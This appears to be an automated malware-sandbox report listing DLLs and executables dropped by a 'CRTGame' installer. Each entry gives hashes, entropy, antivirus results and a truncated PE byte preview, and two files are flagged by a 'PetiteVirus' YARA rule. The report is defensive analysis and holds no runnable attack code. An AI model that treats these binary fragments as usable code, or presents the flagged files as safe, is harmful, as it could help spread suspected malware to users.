Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......\|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..\|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.192037544202194
Encrypted:	false
SSDEEP:	384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:	BEFD36FE8383549246E1FD49DB270C07
SHA1:	1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:	B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:	FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	197646
Entropy (8bit):	6.1570532273946625
Encrypted:	false
SSDEEP:	3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
MD5:	2C8EC61630F8AA6AAC674E4C63F4C973
SHA1:	64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
SHA-256:	DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
SHA-512:	488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	31936
Entropy (8bit):	6.6461204214578
Encrypted:	false
SSDEEP:	768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
MD5:	72E3BDD0CE0AF6A3A3C82F3AE6426814
SHA1:	A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
SHA-256:	7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
SHA-512:	A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.423554884287906
Encrypted:	false
SSDEEP:	6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
MD5:	67247C0ACA089BDE943F802BFBA8752C
SHA1:	508DA6E0CF31A245D27772C70FFA9A2AE54930A3
SHA-256:	BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
SHA-512:	C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.401537154757194
Encrypted:	false
SSDEEP:	3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
MD5:	840D631DA54C308B23590AD6366EBA77
SHA1:	5ED0928667451239E62E6A0A744DA47C74E1CF89
SHA-256:	6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
SHA-512:	1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	62478
Entropy (8bit):	6.063363187934607
Encrypted:	false
SSDEEP:	768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
MD5:	940EEBDB301CB64C7EA2E7FA0646DAA3
SHA1:	0347F029DA33C30BBF3FB067A634B49E8C89FEC2
SHA-256:	B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
SHA-512:	50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..\|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..\|....P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26126
Entropy (8bit):	6.048294343792499
Encrypted:	false
SSDEEP:	384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:	D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:	C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:	E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:	7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18966
Entropy (8bit):	7.620111275837424
Encrypted:	false
SSDEEP:	384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
MD5:	F0F973781B6A66ADF354B04A36C5E944
SHA1:	8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
SHA-256:	04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
SHA-512:	118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...

C:\Program Files (x86)\CRTGame\bin\x86\is-04UN3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	197646
Entropy (8bit):	6.1570532273946625
Encrypted:	false
SSDEEP:	3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
MD5:	2C8EC61630F8AA6AAC674E4C63F4C973
SHA1:	64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
SHA-256:	DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
SHA-512:	488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-060C4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258560
Entropy (8bit):	6.491223412910377
Encrypted:	false
SSDEEP:	6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
MD5:	DB191B89F4D015B1B9AEE99AC78A7E65
SHA1:	8DAC370768E7480481300DD5EBF8BA9CE36E11E3
SHA-256:	38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
SHA-512:	A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-1CHIA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	967168
Entropy (8bit):	6.500850562754145
Encrypted:	false
SSDEEP:	12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
MD5:	C06D6F4DABD9E8BBDECFC5D61B43A8A9
SHA1:	16D9F4F035835AFE8F694AE5529F95E4C3C78526
SHA-256:	665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
SHA-512:	B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-1KFVE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	337408
Entropy (8bit):	6.515131904432587
Encrypted:	false
SSDEEP:	6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
MD5:	62D2156E3CA8387964F7AA13DD1CCD5B
SHA1:	A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
SHA-256:	59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
SHA-512:	006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..\|...\|...\|...p...\|...w...\|.d.r...\|...v...\|...x...\|.i.#...\|...}.\|.\|.d.!...\|...w...\|..V....\|...v...\|.......\|. .z...\|.Rich..\|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-3DBAJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19008
Entropy (8bit):	7.672481244971812
Encrypted:	false
SSDEEP:	384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
MD5:	8EE91149989D50DFCF9DAD00DF87C9B0
SHA1:	E5581E6C1334A78E493539F8EA1CE585C9FFAF89
SHA-256:	3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
SHA-512:	FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...\|...}K...................E..K....p..j...g........Q..........y...........

C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35588
Entropy (8bit):	7.817557274117395
Encrypted:	false
SSDEEP:	768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
MD5:	58521D1AC2C588B85642354F6C0C7812
SHA1:	5912D2507F78C18D5DC567B2FA8D5AE305345972
SHA-256:	452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
SHA-512:	3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(

C:\Program Files (x86)\CRTGame\bin\x86\is-44UDD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5960
Entropy (8bit):	5.956401374574174
Encrypted:	false
SSDEEP:	96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
MD5:	B3CC560AC7A5D1D266CB54E9A5A4767E
SHA1:	E169E924405C2114022674256AFC28FE493FBFDF
SHA-256:	EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
SHA-512:	A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........

C:\Program Files (x86)\CRTGame\bin\x86\is-4LN2K.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.401537154757194
Encrypted:	false
SSDEEP:	3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
MD5:	840D631DA54C308B23590AD6366EBA77
SHA1:	5ED0928667451239E62E6A0A744DA47C74E1CF89
SHA-256:	6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
SHA-512:	1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-63DO2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	126478
Entropy (8bit):	6.268811819718352
Encrypted:	false
SSDEEP:	3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
MD5:	6E93C9C8AADA15890073E74ED8D400C9
SHA1:	94757DBD181346C7933694EA7D217B2B7977CC5F
SHA-256:	B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
SHA-512:	A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-6JHM7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	22542
Entropy (8bit):	5.5875455203930615
Encrypted:	false
SSDEEP:	384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
MD5:	E1C0147422B8C4DB4FC4C1AD6DD1B6EE
SHA1:	4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
SHA-256:	124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
SHA-512:	A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-83310.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	31936
Entropy (8bit):	6.6461204214578
Encrypted:	false
SSDEEP:	768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
MD5:	72E3BDD0CE0AF6A3A3C82F3AE6426814
SHA1:	A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
SHA-256:	7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
SHA-512:	A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8456
Entropy (8bit):	6.767152008521429
Encrypted:	false
